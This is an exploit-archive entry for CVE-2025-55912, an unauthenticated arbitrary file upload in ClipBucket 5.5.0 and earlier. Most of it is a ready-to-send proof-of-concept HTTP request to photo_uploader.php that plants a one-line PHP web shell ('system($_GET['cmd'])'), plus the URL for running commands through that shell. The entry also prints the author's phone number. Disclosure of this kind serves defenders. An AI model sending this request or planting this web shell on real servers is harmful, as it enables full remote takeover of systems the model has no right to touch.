ClipBucket 5.5.0 - Arbitrary File Upload



EKU-ID: 56295 CVE: CVE-2025-55912 OSVDB-ID:
Author: Mukundsinh Solanki (r00td3str0y3r) Published: 2025-09-16 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload

# Google Dork: N/A

# Date: 2025-09-11

# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)

# Vendor Homepage: https://clipbucket.com

# Software Link: https://github.com/MacWarrior/clipbucket-v5

# Version: <= 5.5.0

# Tested on: Ubuntu 20.04 LTS, PHP 7.4

# CVE: CVE-2025-55912

## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).

## PoC Request:

POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--


The file is uploaded without authentication. The attacker can then access
it:


http://victim.com/files/photos/shell.php?cmd=id


## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server

Regards,
Mukundsinh Solanki
+916355251151